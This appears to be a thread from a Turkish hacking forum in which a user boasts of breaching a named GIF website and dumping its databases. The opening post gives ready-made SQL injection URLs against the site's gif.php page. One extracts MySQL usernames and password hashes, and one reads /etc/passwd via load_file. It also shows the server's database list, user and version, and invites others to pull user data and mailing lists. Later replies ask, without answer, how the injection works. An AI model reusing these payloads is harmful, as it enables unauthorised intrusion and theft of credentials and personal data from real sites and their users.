folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Ünlü .Gif Sitesi OMFGİF.Com Hacked /Databese Dumped

Ünlü .Gif Sitesi OMFGİF.Com Hacked /Databese Dumped

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Erkek

Arkadaşlar bugün tbt de gezerken şu konu altında z-chan adlı arkadaşımız bi .gif halinde resim paylaşmıştı bende siteye girip incelediğimde genelde erotik içeriğe sahip olduğunu ve bundan yola çıkarak bayaada hit aldığını düşündüm :D malum abazan gençlik dedim hele bi didikleyelim sonuç mükemmel dosya okumadan tuttalımda tüm db vs columnlar çekilmiştir ... İsteyenler dahada ileri götürüp sidik yarışına çevirebilir neyse gelelim kuru fasulyenin faydalarına

[+] URL:http://omfgif.com/gif.php?id=-4162+AND+1=0+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,darkc0de,11,12--
    [+] Gathering MySQL Server Configuration...
        Database: swagster
        User: swagster@localhost
        Version: 5.1.37-1ubuntu5.1
    [+] Showing all databases current user has access too!
    [+] Number of Databases: 12

[0]broorho
    [1]fetcher
    [2]jesus
    [3]linksDISABLEDdec2009
    [4]lt
    [5]mysql
    [6]ringtones
    [7]si
    [8]swagster
    [9]uselessj_links
    [10]uselessj_nuke

[+]Mysql Kullanıcı ve Şifrelerin Bulunduğu Bölüm
    [!] http://omfgif.com/gif.php?id=-4162+AND+1=0+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat(user,0x3a,password),11,12+FROM+mysql.user--

[+]Dosya Okuma Vs
    [!] http://omfgif.com/gif.php?id=-4162+AND+1=0+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11,12--

İsteyenler database isimlerinden tabloları çekip user bilgilerine ve maillist varsa ulaşabililer...

xD

Part Time Engineer, Full Time Dreamer ..
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Erkek

Konu linkini belirtmeyi unutmuşm... http://www.tahribat.com/Forum-Hz-Adem-In-Yaptigi-Gunah-Degilmidir-110217/

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sokoban
    sokoban's avatar
    Erkek

hacı bu olayın mantığı nedir biraz açıklar mısın yada bununla ilgili bir döküman var mı merak ettim şimdi mesela en burada id=4162+ vs.vs..

diyerek kodları ekledin ama misal ben sql kodunu şöyle yazdıysam

SELECT * FROM tablo where id='$_GET[id]' bu durumda senin + ile birleştirdiğin kısımlar tırnak içinde kalıyor ve en fazla mysql den dataset dönmedi diye hata verir ama sen bi ton şey çıkarıyon nasıl başarıyon bunları :D

.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SysTeMeRRoR
    SysTeMeRRoR's avatar
    Erkek

bisi anladiysam arap oliyim :)

"Hayatta en acikli sey, bir insanin, problemin kendinden kaynaklandigini gorememesidir." Carl Gustav Jung
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Erkek

sokoban bunu yazdı:
    -----------------------------

hacı bu olayın mantığı nedir biraz açıklar mısın yada bununla ilgili bir döküman var mı merak ettim şimdi mesela en burada id=4162+ vs.vs..

SELECT * FROM tablo where id='$_GET[id]' bu durumda senin + ile birleştirdiğin kısımlar tırnak içinde kalıyor ve en fazla mysql den dataset dönmedi diye hata verir ama sen bi ton şey çıkarıyon nasıl başarıyon bunları :D

Hocam sen direk kodlama yapmışsın xD Bense sitedeki mevcut kodlama açığından faydalanıp databse vs çekiyoırm

6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sokoban
    sokoban's avatar
    Erkek

dersimlihacker bunu yazdı:

sokoban bunu yazdı:

Hocam sen direk kodlama yapmışsın xD Bense sitedeki mevcut kodlama açığından faydalanıp databse vs çekiyoırm

Yok hacı yanlış anladın :D ben gidip get değeri olarak yazmadım bunları yani sitenin işleyiş mantığı içerisinde değerlendiriyorum

bu get gidecek böyle bir sql koduna girecek neticede senin aldığın sonucu almaz mysql_Fetch_Array hatası verir nasıl vermiyor onu anlamaya çalışıyorm

.
Toplam Hit: 1816 Toplam Mesaj: 6